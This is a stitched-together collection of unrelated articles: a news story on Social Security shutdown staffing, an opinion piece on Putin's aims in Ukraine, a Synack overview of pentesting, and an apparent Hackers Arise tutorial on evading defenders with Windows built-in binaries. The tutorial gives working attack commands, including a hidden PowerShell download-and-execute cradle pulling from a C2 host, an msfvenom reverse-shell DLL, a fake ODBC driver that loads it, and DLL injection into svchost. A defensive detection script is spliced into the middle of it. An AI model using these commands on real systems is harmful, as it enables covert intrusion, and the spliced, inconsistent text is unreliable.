
Social Security considers pausing more work, as shutdown takes a toll on employees

The Social Security Administration is considering whether to put more of its in-person services on hold, as employees working without pay during the longest government shutdown can no longer afford the cost of coming into the office.

SSA’s Chief of Field Operations Andy Sriubas told managers on a call Thursday afternoon that the agency may need to stop issuing replacement Social Security cards, if the shutdown continues, given concerns about short staffing.

Several managers also told Sriubas, in a recording of the call obtained by Federal News Network, that some field office employees working without pay are asking to be furloughed, because they can no longer cover commuting costs.

Many federal employees have missed two full paychecks during the shutdown, and received one partial paycheck.

“If this goes into next week, I asked folks to start thinking about what are the workloads … we’re just not doing that, going forward, until the shutdown ends,” Sriubas said.

Depending on when Congress reaches a deal to end the shutdown, it’s possible that SSA employees receive a partial paycheck before receiving the rest of their retroactive pay.

Replacement Social Security cards are one of the biggest reasons individuals show up at Social Security offices. Last year, about 7.7 million people requested replacement cards. The agency stopped issuing replacement Social Security cards in previous shutdowns.

Much of SSA’s workforce is considered “excepted” and continues working without pay during a shutdown. But Sriubas said the agency may need to scale back some shutdown-exempt services if the shutdown lasts much longer.

“Just because it’s an excepted workload doesn’t mean we have to do it. So we can decide not to do it,” he told managers.

SSA was planning to launch its new appointment scheduling system in January. But Sriubas said the rollout has been pushed back by about six weeks because of the shutdown.

An SSA spokesperson told Federal News Network that “Social Security Administration continues to serve our nation’s seniors and most vulnerable populations during the Democrat shutdown.”

“We recognize this is a stressful and challenging time for SSA employees who are currently working without pay because the Democrats won’t reopen the government,” the spokesperson said.

Senate Democrats on Friday proposed voting for a continuing resolution to end the shutdown, in exchange for a one-year extension of Affordable Care Act tax credits. But Senate Majority Leader John Thune (R-S.D.) called the plan a “nonstarter.”

‘They won’t be able to afford to work at the agency’

One manager said during the call that employees can no longer afford commuting costs, including filling up their cars to drive to work. Others are asking to be furloughed, so that they can take second jobs to pay their bills.

“Pretty soon, they won’t be able to afford to work at the agency,” the manager said.

SSA required all employees to work fully on-site beginning in March, because of President Donald Trump’s return-to-office orders for the federal workforce. But there is still a possibility, at times, for employees to get approval for “episodic telework,” a shorter-term option when unexpected personal circumstances arise.

Sriubas said teleworking five days a week is still prohibited, and that managers can furlough staff for the remainder of the shutdown, so that they don’t have to spend any money to come into the office.

“That’s, unfortunately, the only option we have,” he said.

The American Federation of Government Employees, which represents about 42,000 SSA employees nationwide, is calling on SSA to allow more routine telework during the shutdown.

If enough SSA employees request furlough status, some offices may need to be temporarily closed.

SSA closed two of its 1,250 field offices on Monday due to limited staffing. An agency spokesperson said one of the offices reopened for normal operations on Tuesday. Sriubas told managers that more offices may be at risk of temporary closures, if the shutdown drags on.

“I understand that that’s going to happen, and nobody wants to close an office. You guys are all captains of your ship, and everybody wants to make sure that that’s never going to happen. But I also understand that people have to live their lives, and they have limited means to do that when you’re now missing your second full paycheck,” he said. “So if putting people on furlough is the only thing you can do, if it’s the best thing for the employee, that’s what we’re going to have to do.”

Some managers said employees are frustrated, because they want to keep working during the shutdown, but are financially squeezed and unable to telework.

“We do have employees that have been embarrassed to come to me and say that they can’t afford to come to work, and they want to telework instead of being furloughed, and I understand that’s not an option,” another manager said. “There really are people that are struggling with the decision between finding a way to get to work, and wanting to work, and our only option is being furloughed.”

Other managers said employees are scared to go on furlough, because the Trump administration has floated the possibility that furloughed staff will not receive back pay once the shutdown ends.

“I have employees that are skeptical and kind of scared, to be truthful, to use furlough because they’re not comfortable or confident that once the shutdown is over, that they’re going to be compensated if they were on a furlough status,” a third manager said.

Sriubas acknowledged the administration has created uncertainty around back pay for furloughed employees, but said it would be “political suicide for either the Republican or the Democrat party to suggest that they wouldn’t support paying the people that were on furlough during this whole process.”

“Rumors in the press are just simply that — rumors in the press. In the past, everybody has gotten paid, and it is expected that most likely everybody will get paid who’s on furlough. But, you don’t know, it’s not 100% and I appreciate people are nervous to go on furlough because of that — because that risk that they wouldn’t get paid,” he said.

During the shutdown, SSA has paused some mandated work that carries benchmarks set by Congress. That includes continuing disability reviews (CDRs) and redeterminations for Supplemental Security Income (RZs).

The former involves SSA reviewing the medical records of those receiving disability benefits, and determining whether they are still disabled. The latter involves the agency reviewing non-medical factors — like income and resources — to determine if individuals should remain on disability benefits.

Congress mandated SSA to complete 2.4 million redeterminations for Supplemental Security Income and 400,000 continuing disability reviews last year. Sriubas said SSA will work on resetting its workload targets once the shutdown ends.

“I fully appreciate that we’re not going to be able to deliver what we thought we were going to deliver when we looked like we had a 12-month year to be able to go do that stuff,” he said.

A fourth manager said during the call that it is “hard to keep morale going,” and that employees know that “as soon as the shutdown is over, we’re going to hit them hard” with a backlog of casework.

“It’s very frustrating when we have to keep those staff motivated — and we need them for the long haul. Not just for this fiscal year, the next fiscal year,” the manager said.

Sriubas said the agency will offer overtime to employees to dig out from the backlog. SSA managers were also told during the call that once the shutdown ends, the agency will work with the Interior Department — which handles payroll for a wide swath of the federal workforce — to ensure excepted employees receive retroactive pay “as quickly as possible.”

The post Social Security considers pausing more work, as shutdown takes a toll on employees first appeared on Federal News Network.


FILE - The U.S. Social Security Administration office is seen in Mount Prospect, Ill., Oct. 12, 2022. (AP Photo/Nam Y. Huh, File)

PowerShell for Hackers – Survival Edition, Part 4: Blinding Defenders

Welcome back, cyberwarriors! 

We hope you have been learning a lot from us throughout the Survival series. Today, we introduce Living off the Land techniques that can be abused without triggering alarms. Our goal is to use the knowledge from previous articles to get the job done without drawing unnecessary attention from defenders. All the commands we cover across these two parts are benign, native, and also available on legacy systems. Not all of them are well known, and tracking every one is impractical because they generate a flood of logs that is hard to dig through. As you may know, some legitimate software also looks suspicious in its process and driver names. The resulting false positives quickly wear defenders down, so in many environments you can fly under the radar with these commands.

Today, you’ll learn how to execute different kinds of scripts as substitutes for .ps1 scripts since they can be monitored, create fake drivers, and inject DLLs into processes to get a reverse shell to your C2.

Let’s get started!

Execution and Scripting

Powershell

Let’s recall the basic concepts of stealth in PowerShell from earlier articles. PowerShell is a built-in scripting environment used by system administrators to automate tasks, check system status, and configure Windows. It’s legitimate and not suspicious unless executed where it shouldn’t be. Process creation can be monitored, but it often isn’t: doing so takes effort and dedicated tooling. The same applies to .ps1 scripts. This is why, in one of the previous articles, we learned how to convert .ps1 to .bat to blend in. It doesn’t mean you should avoid PowerShell or its scripts, as you can create a great variety of tools with it.

Here’s a reminder of how to download and execute a script in memory with stealth:

PS > powershell.exe -nop -w h -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')"

Walkthrough: This tells PowerShell to start quickly without loading user profile scripts (-nop), hide the window (-w h), ignore script execution rules (-ep bypass), download a script from a URL, and run it directly in memory (DownloadString + Invoke-Expression).

When you would use it: When you need to fetch a script from a remote server and run it quietly.

Why it’s stealthy: PowerShell is common for admin tasks, and in-memory execution leaves no file on disk for antivirus to scan. Skipping user profile scripts avoids potential monitoring embedded in them.

A less stealthy option would be:

PS > iwr http://c2/script.ps1 | iex 

It’s important to keep in mind that Invoke-WebRequest (iwr) and Invoke-Expression (iex) are often abused by hackers. Later, we’ll cover stealthier ways to download and execute payloads.

CMD

CMD is the classic Windows command prompt used to run batch files and utilities. Although this module focuses on PowerShell, stealth is our main concern, so we cover some CMD commands. With its help, we can chain utilities, redirect outputs to files, and collect system information quietly.

Here’s how to chain enumeration with CMD:

PS > cmd.exe /c "whoami /all > C:\Temp\privs.txt & netstat -ano >> C:\Temp\privs.txt"

Screenshot: using cmd to chain commands

Walkthrough: /c runs the command and exits. whoami /all gets user and privilege info and writes it to C:\Temp\privs.txt. netstat -ano appends active network connections to the same file. The user doesn’t see a visible window.

When you would use it: Chaining commands is handy, especially if Script Block Logging is in place and your commands get saved.

Why it’s stealthy: cmd.exe is used everywhere, and writing to temp files looks like routine diagnostics.

cscript.exe

This runs VBScript or JScript scripts from the command line. Older automation relies on it to execute scripts that perform checks or launch commands. Here we mainly use it to sidestep monitoring of .ps1 execution. Below, you can see how we executed a JScript script.

PS > cscript //E:JScript //Nologo C:\Temp\script.js

Screenshot: using cscript to load .js files

Walkthrough: //E:JScript selects the JScript engine, while //Nologo hides the usual banner. The final argument is the script that will be run.

When you would use it: For all kinds of tasks; a typical case is an enumeration script, which AI can help you draft.

Why it’s stealthy: It’s less watched than PowerShell in some environments and looks like legacy automation.

wscript.exe

By default, it runs Windows Script Host (WSH) scripts (VBScript/JScript), often for scripts showing dialogs. As a pentester, you can run a VBScript in the background or perform shell operations without visible windows.

PS > wscript.exe //E:VBScript C:\Temp\enum.vbs //B

Screenshot: using wscript to run .vbs scripts

Walkthrough: //B runs in batch mode (no message boxes). The VBScript at C:\Temp\enum.vbs is executed by the Windows Script Host.

When you would use it: As with cscript, it depends on the script you write. We used a system enumeration script that writes its output to a text file.

Why it’s stealthy: Runs without windows and is often used legitimately.

mshta.exe

Normally, it runs HTML Applications (HTA) containing scripts, used for small admin UIs. For pentesters, it’s a way to execute HTA scripts with embedded code. It requires a graphical interface.

PS > mshta users.hta 

Screenshot: using mshta to run .hta scripts

Walkthrough: mshta.exe runs the script code in users.hta, which could create a WScript object and execute commands, potentially opening a window with the output.

When you would use it: To run a seemingly harmless HTML application that executes shell commands.

Why it’s stealthy: It looks like a web or UI component and can bypass some script-only rules.

DLL Loading and Injections

These techniques rely on legitimate DLL loading or registration mechanics to get code running.

Rundll32.exe

Used to load a DLL and call its exported functions, often by installers and system utilities. Pentesters can use it to execute a script or function in a DLL, like a reverse shell generated by msfvenom. Be cautious, as rundll32.exe is frequently abused.

C:\> rundll32.exe C:\reflective_dll.x64.dll,TestEntry

Screenshot: using rundll32 to run DLLs

Walkthrough: The command runs rundll32.exe to load reflective_dll.x64.dll and call its TestEntry function.

When you would use it: To execute a DLL’s code in environments where direct execution is restricted.

Why it’s stealthy: rundll32.exe is a common system binary and its activity can blend into normal installer steps.

Regsvr32.exe

In plain terms, it adds or removes special Windows files (like DLLs or scriptlets) from the system’s registry so that applications can use or stop using them. It is another, less frequently used, way to execute DLLs.

PS > regsvr32.exe /u /s .\reflective_dll.x64.dll

Screenshot: using regsvr32 to run DLLs

Walkthrough: regsvr32 loads the DLL; /u selects the unregister path and /s suppresses the dialog boxes, so nothing is shown on screen.

When you would use it: To execute a DLL via a registration process, mimicking maintenance tasks.

Why it’s stealthy: Registration operations are normal in IT workflows, so the call can be overlooked.

odbcconf.exe

Normally, odbcconf.exe helps programs connect to databases by setting up drivers and connections. You can abuse it to run your DLLs. Below is an example of how we executed a generated DLL and got a reverse shell.

bash > msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.57 LPORT=4444 -f dll -o file.dll

Screenshot: generating a DLL file

PS > odbcconf.exe INSTALLDRIVER "Printer-driverX|Driver=C:\file.dll|APILevel=2"

PS > odbcconf.exe CONFIGSYSDSN "Printer-driverX" "DSN=Printer-driverX"

Screenshot: creating a fake driver with odbcconf

Screenshot: receiving the connection back to the C2

Walkthrough: The first odbcconf command tells Windows to register a fake database driver named “Printer-driverX” backed by our DLL. The APILevel=2 part makes it look like a legitimate driver. When Windows processes this, it loads file.dll, which runs the reverse shell inside it. The second odbcconf command creates a system data source (DSN) named “Printer-driverX” tied to that fake driver, which triggers the DLL to load again, ensuring the code runs.

When you would use it: To execute a custom DLL stealthily, especially when other methods are monitored.

Why it’s stealthy: odbcconf is a legit Windows tool rarely used outside database admin tasks, so it’s not heavily monitored by security tools or admins on most systems. Using it to load a DLL looks like normal database setup activity, hiding the malicious intent.

Installutil.exe

Normally, it is a Windows tool that installs or uninstalls .NET programs, like DLLs or executables, designed to run as services or components. It sets them up so they can work with Windows, like registering them to start automatically, or removes them when they’re no longer needed. In pentest scenarios, the command is used to execute malicious code hidden in a specially crafted .NET DLL by pretending to uninstall it as a .NET service.

PS > InstallUtil.exe /logfile= /LogToConsole=false /U file.dll

Walkthrough: The command tells Windows to uninstall a .NET assembly (file.dll) that was previously set up as a service or component. The /U flag means uninstall, /logfile= skips creating a log file, and /LogToConsole=false hides any output on the screen. If file.dll is a malicious .NET assembly with a custom installer class, uninstalling it can trigger its code, like a reverse shell when the command processes the uninstall. However, for a DLL from msfvenom, this may not work as intended unless it’s specifically a .NET service DLL.

When you would use it: When you have admin access and need to execute a .NET payload stealthily, especially if other methods are unavailable.

Why it’s stealthy: Install utilities are commonly used by developers and administrators.

Mavinject.exe

Essentially, it was designed to help with Application Virtualization, where Windows executes apps in a virtual container. We use it to inject DLLs into running processes to get our code executed. We recommend using system processes for injections, such as svchost.exe. Here is how it’s done:

PS > MavInject.exe 528 /INJECTRUNNING C:\file.dll

Screenshot: using mavinject to inject a DLL into a process and get a reverse shell

Walkthrough: Targets process ID 528 (svchost.exe) and instructs MavInject.exe to inject file.dll into it. When the DLL loads, it runs the code and we get a connection back.

When you would use it: To inject a DLL for a high-privilege reverse shell, such as SYSTEM access.

Why it’s stealthy: MavInject.exe is a niche Microsoft tool, so it’s rarely monitored by security software or admins, making the injection look like legitimate system behavior.

Summary

Living off the Land techniques matter a lot in Windows penetration testing, as they let you achieve your objectives using only built-in Microsoft tools and signed binaries. That reduces the forensic footprint and makes your activity blend with normal admin behavior, which increases the chance of bypassing endpoint protections and detection rules. In Part 1 we covered script execution and DLL injections, some of which will significantly improve your stealth and capabilities. In Part 2, you will explore network recon, persistence, and file management to further evade detection. Defenders can also learn a lot from this to shape their detection strategies. But as mentioned earlier, monitoring system binaries might generate a lot of false positives.
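As an added defender-side example (not code from the Hackers Arise article or the tools it describes), here is a small Python detector that runs the command-line patterns discussed in both sections above over constructed Sysmon Event ID 1 (process creation) records exported as JSON lines, and allowlists DLLs under trusted directories so that routine installer activity stays quiet. The field names follow Sysmon's (Image, CommandLine, ParentImage, ProcessId); the rule names, the trusted-directory list and every sample event are this example's own assumptions.

```python
"""Detection sketch for the LOLBin command lines shown in this article.

Reads Sysmon Event ID 1 (process creation) records exported as JSON lines,
flags the patterns discussed above, and allowlists DLL paths under trusted
directories so routine installer activity does not raise an alert.
"""
import json
import ntpath
import re

# (rule name, image basename, case-insensitive regex over the command line)
RULES = [
    ("powershell_download_cradle", "powershell.exe",
     r"(?=.*\b(?:iex|invoke-expression)\b)"
     r"(?=.*(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b))"),
    ("cscript_jscript_engine", "cscript.exe", r"//e:jscript"),
    ("wscript_batch_mode", "wscript.exe", r"(^|\s)//b\b"),
    ("mshta_hta_launch", "mshta.exe", r"\.hta\b|javascript:|vbscript:"),
    ("rundll32_untrusted_dll", "rundll32.exe", r"\.dll\s*,"),
    ("regsvr32_silent_or_unregister", "regsvr32.exe", r"(^|\s)/[su]\b|/i:"),
    ("odbcconf_driver_or_dsn", "odbcconf.exe",
     r"\b(installdriver|configsysdsn|configdsn|regsvr)\b"),
    ("installutil_uninstall", "installutil.exe", r"(^|\s)/u\b"),
    ("mavinject_injectrunning", "mavinject.exe", r"/injectrunning"),
]
COMPILED = [(n, img, re.compile(rx, re.IGNORECASE)) for n, img, rx in RULES]

# Loaders whose hit is dropped when every DLL they name lives in a trusted
# directory. mavinject is never excused: injection itself is the signal.
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe", "odbcconf.exe", "installutil.exe"}
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")
# Absolute path, .\relative path, or bare file name ending in .dll
DLL_PATH = re.compile(r'[A-Za-z]:\\[^"|,]+?\.dll|\.\\[^"|,\s]+\.dll|[^\s"|,\\]+\.dll',
                      re.IGNORECASE)


def dll_paths(cmdline):
    """Every DLL path or file name referenced on a command line, in order."""
    return [m.group(0) for m in DLL_PATH.finditer(cmdline)]


def is_trusted_dll(path):
    """True only for an absolute path under TRUSTED_DLL_DIRS; relative paths
    (.\\x.dll, file.dll) and drive-root drops such as C:\\file.dll are not."""
    return path.lower().startswith(TRUSTED_DLL_DIRS)


def evaluate(event):
    """Return a finding for one Sysmon-style record, or None if no rule fires."""
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    for name, rule_image, rx in COMPILED:
        if image != rule_image or not rx.search(cmd):
            continue
        dlls = dll_paths(cmd)
        if rule_image in DLL_LOADERS and dlls and all(is_trusted_dll(d) for d in dlls):
            continue  # e.g. msiexec registering a vendor DLL under Program Files
        return {"rule": name, "pid": event.get("ProcessId"), "image": image,
                "parent": ntpath.basename(event.get("ParentImage", "")).lower(),
                "dlls": dlls, "cmdline": cmd}
    return None


def scan(jsonl):
    """Run every rule over a JSON-lines export and collect the findings."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            hit = evaluate(json.loads(line))
            if hit:
                findings.append(hit)
    return findings


def flagged_rules(jsonl):
    """Just the rule names that fired, in event order."""
    return [f["rule"] for f in scan(jsonl)]


# Constructed Sysmon EID 1 records (not real telemetry). The command lines are
# the ones from the article plus two routine ones that should stay quiet.
SAMPLE_EVENTS = r"""
{"ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell.exe -nop -w h -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')\""}
{"ProcessId": 4188, "Image": "C:\\Windows\\System32\\cscript.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cscript //E:JScript //Nologo C:\\Temp\\script.js"}
{"ProcessId": 4210, "Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "regsvr32.exe /u /s .\\reflective_dll.x64.dll"}
{"ProcessId": 4222, "Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "regsvr32.exe /s \"C:\\Program Files\\ExampleVendor\\vendor.dll\""}
{"ProcessId": 4250, "Image": "C:\\Windows\\System32\\rundll32.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"}
{"ProcessId": 4255, "Image": "C:\\Windows\\System32\\rundll32.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "rundll32.exe C:\\reflective_dll.x64.dll,TestEntry"}
{"ProcessId": 4261, "Image": "C:\\Windows\\System32\\odbcconf.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "odbcconf.exe INSTALLDRIVER \"Printer-driverX|Driver=C:\\file.dll|APILevel=2\""}
{"ProcessId": 4300, "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "InstallUtil.exe /logfile= /LogToConsole=false /U file.dll"}
{"ProcessId": 4333, "Image": "C:\\Windows\\System32\\mavinject.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "MavInject.exe 528 /INJECTRUNNING C:\\file.dll"}
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['rule']}] pid={f['pid']} parent={f['parent']} dlls={f['dlls']}")
```

Seven of the nine constructed events fire; the msiexec-driven regsvr32 registration and the shell32.dll control-panel call are dropped by the trusted-directory check, which is the kind of baseline a team needs before alerting on these binaries at all.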

Resources:

https://lofl-project.github.io

https://lolbas-project.github.io/#

The post PowerShell for Hackers – Survival Edition, Part 4: Blinding Defenders first appeared on Hackers Arise.

Lies, Flattery, and Land-Grabs: Putin’s Tactics in Ukraine

OPINION — “The reason why I still remain pessimistic is that everything that [Russian President Vladimir] Putin says is he still wants those four territories…Eastern Ukraine. He hasn't achieved that yet. And he wants Ukraine to be at least subjugated to Russia, because he doesn't think that Ukraine's an independent country or independent nation. Ukrainians are just Russians with accents. That's his view. I've heard him talk about it personally. I've been in the room when he talks that way. And maximally he wants to bring it all into Russia. So, tragically, I think the only way he negotiates seriously is when he's stopped on the battlefield and his armies cannot march further west.”

That was Michael McFaul, President Obama’s Ambassador to Russia (2012-to-2014), speaking with Katie Couric August 18, on YouTube. McFaul, a Russian expert, is today a professor at Stanford University and Director of its Freeman Spogli Institute for International Studies.

In the 53-minute conversation, McFaul provided a background to the Ukraine war, shared his views on the relations between Putin and President Trump, and talked about the possible future when it comes to the NATO and European Union nations and the United States.

Early in their conversation, McFaul provided an interesting background to the past and current fighting which has been taking place in eastern Ukraine, adjacent to Russia.

“So there are four regions that most of the fighting has been taking place,” McFaul said, “In each of those four regions [they] are partially occupied by the Russians today.”

Two of the four regions, Donetsk and Luhansk, together form what’s called the Donbas. Russia holds all of Luhansk and 75 percent of Donetsk. The other two regions are Kherson and Zaporizhzhia, where Russia has about 70 percent of the land.

McFaul said, “Two years ago Putin held a big ceremony where he said these new four regions are now part of the Russian Federation in addition to Crimea, which he annexed back in 2014…So five regions of Russia, five states if you will of the Ukrainian country Putin has already, you know, annexed.”

“On paper,” McFaul continued, Putin “had a big ceremony, there's parades, and the Kremlin and they say he had all these fictitious leaders from these places saying you're now part of Russia, right, but de facto on the ground in reality he doesn't control any of those places 100%.”

McFaul explained the “Donbas is rich in minerals. It's the industrial base of the country. So I think it's like eight or nine percent of the [Ukraine] population…but it's more like 15 percent of the GDP [gross national product] of the entire country. So it would be a tremendous loss to Ukraine. That is true. Also, half parts of it have been occupied de facto by Russian surrogates since 2014. So another important thing to realize is that once that happened, many hundreds of thousands of Ukrainians left that territory. They're living all over the place. I have friends from those regions that are living in Germany, living here in the United States, and living in parts, other parts of Ukraine.”

McFaul tied the Donbas to what happened when Trump met with Putin in Alaska on August 15, saying, “We never really got a good readout from what happened in Alaska, but to the best of our understanding, what Putin asked for in Alaska, pretty audacious. He said, Donbas, that's two of those regions, right? That's up in the northwest corner, northeast corner. He said, Mr. President, convince Zelensky to leave Donbas. Remember Ukrainian soldiers and Ukrainians now hold parts of Donbas as we speak…It's Ukrainian held territory and Putin says you got to convince Zelensky to give me those two regions and in return I will stop fighting in those other two regions that I just mentioned. Right? Kherson and Zaporizhzhia…So that's his deal.”

McFaul went on, “That's his offer. And the Ukrainians, you know, I talked to many Ukrainians afterwards. I mean, this is nonsense from them. The idea that they would give up territory that hasn't even been conquered is just a non-starter. But that's what Putin asked for.”

McFaul also set out what he thought the Ukrainians might settle for, while making clear Zelensky had never said it directly.

“I think,” McFaul said, “the part [of Ukraine] that was occupied since 2014 [Crimea, small sections of the Donbas] is a part that Ukrainian people and President Zelensky could live with giving up. Again, I want to stress, they're not going to recognize it as part of Russia, but they could recognize that they will only seek reunification through peaceful means. That's the language...That means that in reality it would be under Russia, you know, as long as Putin's in power.”

McFaul added, “But they're only going to do that if they have some guarantee from the West that by doing that they get something in return for their security. And so when you hear this phrase ‘land for peace,’ the Ukrainians keep saying, well, yeah, you guys keep asking us for land, but you never say what the peace part is. And that is what the conversation [Trump with Zelensky with European leaders] at the White House today [August 21] is, I think, principally focused on.”

Before talking about the Trump/Putin relationship, McFaul gave some interesting personal background about the Russian President.


“I can tell you Putin is an effective interlocutor,” McFaul said, “He is an effective speaker. He will go on and on about Russian history. He'll spin it in his own way. And if you don't know, you know, what happened in the 15th century, and even I don't, you know, so most presidents don't, it's hard to follow. In one meeting with Obama, he [Putin] went on for 58 minutes in the beginning of the meeting before President Obama even had the chance to speak. So that's the way he rolls. I just fear that Trump accepted his, you know, perverse notion of history.”

I saw an example of this side of Putin four years ago, before Russia’s invasion of Ukraine, when a friend suggested I read a 10-page essay published by the Russian President on July 12, 2021, entitled, On the Historical Unity of Russians and Ukrainians. It can still be accessed on Putin’s website.

Putin began it by writing, “During the recent Direct Line [a TV question-and-answer session with Putin] when I was asked about Russian-Ukrainian relations, I said that Russians and Ukrainians were one people – a single whole. These words were not driven by some short-term considerations or prompted by the current political context. It is what I have said on numerous occasions and what I firmly believe. I therefore feel it necessary to explain my position in detail and share my assessments of today's situation.”

Putin continues to push that idea, as he did on August 16 in his joint press conference with Trump in Alaska, when he described Ukrainians as “a brotherly people, no matter how strange it may sound in today’s circumstances. We share the same roots, and the current situation is tragic and deeply painful to us. Therefore, our country is sincerely interested in ending this.”

At one point in their conversation, Couric asked McFaul, “Do you think that Donald Trump is being played by Putin?”

McFaul answered: “Honestly, I think he [Putin] thinks of Trump as being just a really weak leader and with a little bit of praise and a little bit of, you know, repeating things that are false that Trump wants to hear, he can win him over…So in Alaska, Putin said, ‘I would have never invaded Ukraine had you been president.’ And that's exactly what Trump wanted to hear.”

McFaul went on, “And then behind closed doors, as we learned later in his conversation with Sean Hannity, Putin went on and on about how the 2020 elections was stolen because of mail-in ballots, because of mail-in voting, right?”


I studied the Fox Hannity August 15 interview where Trump spoke of “one of the most interesting things” Putin had told him, which was, “Your [the U.S. 2020] election was rigged because of mail-in voting.” Trump then continued. “He [Putin] said mail-in voting, every election. He [Putin] said, no country has mail-in voting. It’s impossible to have mail-in voting and have honest elections.”

McFaul’s response to Trump’s description to Hannity of that portion of his exchange with Putin reflected what other American commentators have said.

“I just listened to the President [Trump] talk about that [Putin’s view of the 2020 election],” McFaul said, “and I just can't believe that he [Trump] would be so gullible. Honestly, I guess I should get used to it by now. But what an absurd thing for him [Putin] to claim…How does Putin know that that happened [in the 2020 election]? And no credible American organization, no investigative journalists have uncovered that. But somehow mysteriously the president of Russia knows that it was stolen because there was mail-in voting. And yet the President [Trump] just repeated that and that's how Putin has won him over.”

Three days later, on August 18, Trump messaged on Truth Social: “I am going to lead a movement to get rid of MAIL-IN BALLOTS…We are now the only Country in the World that uses Mail-In Voting. All others gave it up because of the MASSIVE VOTER FRAUD ENCOUNTERED.”

In fact, as reported by Politifact, a Sweden-based organization, Supporting Democracy Worldwide, in an October 2024 report found that at least 20 countries other than the U.S. allow some form of mail-in voting, including Austria, Australia, Japan, India, Canada, Ireland, Greece, Poland, Slovenia, Spain, Switzerland, and the United Kingdom.

Towards the end of the interview, McFaul said there were two major things he hoped for.

“One,” he said was “the security guarantee that we've been talking about where European soldiers are deployed on Ukrainian territory to help keep the peace. Peacekeepers, you know, tripwire. I don't really like that word tripwire, but where they're there to just keep that border, right?... And you go up to the border and you see all the soldiers there and you see the barbed wire that keeps the peace.”

The second thing McFaul hoped for involved “about $300 billion dollars of Russian central bank assets and other Russian assets that are in our banks. They were correctly, brilliantly frozen by the G7…back in 2022,” after Putin invaded Ukraine.

McFaul said, “The next move, those assets have to be given to Ukraine. Americans don't want to pay for reconstruction. Europeans don't want to pay for it. That's money is sitting right there.” It would be used, McFaul said, as “part of a sweetener” for Zelensky because “he's got to have something else to give the Ukrainian people” to keep fighting against the Russians.

McFaul’s closing point is worth remembering.

Referring to the NATO allies at the White House with Zelensky, McFaul said it should “remind everybody that Moscow, neither the Soviets or the Russians, have never attacked a NATO country. So NATO expansion has helped to keep the peace especially in places like the Baltic states. But also NATO has never attacked the Soviet Union or Russia. And so we shouldn't buy into this argument that it's a threat to Russia. It's not a threat to Russia…We have to think about NATO as an alliance that preserves the peace rather than causes conflict.”

The Cipher Brief is committed to publishing a range of perspectives on national security issues submitted by deeply experienced national security professionals.

Opinions expressed are those of the author and do not represent the views or opinions of The Cipher Brief.


What You’re Missing About Pentesting: 6 Tools That Look Like Pentesting But Aren’t

By: Synack

By Kim Crawley

Not everything that’s called “pentesting” is pentesting. There’s an abundance of different types of security testing and tools that use different methodologies for different stakeholders with differing agendas. Security testing, which includes pentesting and also vulnerability assessment, compliance auditing and other formats, is even broader. We’ll break down the differences between types of pentesting and strategies that are labeled pentesting but are fundamentally different. 

First, what are you testing for?

Are you trying to penetrate a network or computer system like a cyber threat actor, but with permission from the owner for the purposes of discovering security vulnerabilities? Then chances are what you’re doing is pentesting. If you’re using a checklist of security standards of some sort and looking for vulnerabilities without simulating cyber attacks, that’s a vulnerability assessment. It sounds obvious, but some entities try to sell vulnerability assessments by incorrectly calling them pentests. Pentests aren’t “better” than vulnerability assessments; they’re different types of security testing. Each can be the best solution for different problems.

The Flavors of Pentesting

Pentesting is having specially trained people simulate cyber attacks. They can use applications and scripts, and even conduct analog activities such as social engineering and physical security pentesting. Its strength and weakness are the people doing the testing and the platform they work on. Without good testers on an efficient platform, the test may not leave the buyer with confidence. Traditional pentesting relies only on the skills of a few people and outputs a readable report, not data. Synack was founded to get the best testers on the best platform for the best pentest possible. A pentest’s output – at least Synack style – is real-time access to findings, remediation information, analytics about testing and more.

Different types of pentesting can be categorized according to which facet of a computer system is being tested. The major categories are network pentesting, application pentesting, social engineering pentesting that finds vulnerabilities in people, and physical pentesting that finds vulnerabilities in buildings, doors, windows, rooms and the like.

Pentesting is also categorized according to the information available to the testers. Blackbox testing is done with little to no knowledge of the target, from the perspective of an external attacker. Whitebox testing is done with in-depth target knowledge, from the perspective of an internal attacker in the target’s IT department. Greybox testing sits in the middle, from the perspective of a nontechnical insider.

There are also other ways to prepare for cyber threats that are different from pentesting. Let’s explore some of them. 

Methodologies for Security Testing (That Aren’t Pentesting)

Breach and Attack Simulation (BAS) based on attack replay or scripting is a relatively recent development in security testing tech. Scripts that simulate specific exploits can be executed whenever an administrator needs to test a particular attack. This way, teams are better trained to know how to spot attack patterns and unusual log activity. When the cybersecurity community discovers new exploits, scripts can be written to simulate those exploits. Note that this takes time, so BAS may not be as current as adversarial tradecraft. The testing-like output is confirmation of how many known vulnerabilities with easily scriptable exploits exist in your environment.

BAS is best suited for testing security responses, to ensure teams know how to spot attack patterns and strange attacks in their log systems. This is a great training tool for blue teams, but it will not generally result in the discovery of unknown vulnerabilities. It shouldn’t be viewed as a pentest replacement, and the scripted models usually lag current adversary tradecraft.

